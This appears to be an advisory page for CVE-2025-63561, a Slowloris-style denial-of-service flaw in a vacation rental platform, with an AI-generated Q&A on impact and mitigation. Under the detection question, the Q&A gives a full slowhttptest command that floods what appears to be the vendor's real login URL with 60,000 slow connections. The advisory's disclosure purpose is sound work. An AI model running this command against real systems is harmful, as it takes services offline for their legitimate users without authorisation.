CVE-2025-63561
BaseFortify
Publication date: 2025-10-31
Last updated on: 2025-11-05
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| summerpearlgroup | vacation_rental_management_platform | to 1.0.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-400 | The product does not properly control the allocation and maintenance of a limited resource. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a Slowloris-style Denial-of-Service (DoS) attack affecting the Summer Pearl Group Vacation Rental Management Platform versions prior to 1.0.2. An attacker opens and maintains many slow or partially-completed HTTP connections to the server, which exhausts the server's connection pool and worker threads. This prevents legitimate users and API requests from accessing the service. [1]
How can this vulnerability impact me? :
The vulnerability can cause a denial of service by exhausting the server's resources, making the platform unavailable to legitimate users and API clients. This means users cannot access the service, potentially disrupting business operations and user experience. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by simulating a Slowloris-style attack using the 'slowhttptest' tool. For example, you can run the command: slowhttptest -c 60000 -B -g -o slowhttp -i 10 -r 60000 -t GET -u https://summerpearlgroup.gr/spgpm/login to simulate 60,000 slow HTTP GET requests to the login endpoint and observe if the server's connection pool and worker threads are exhausted. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade the Summer Pearl Group Vacation Rental Management Platform to version 1.0.2 or later, where this vulnerability is resolved. [1]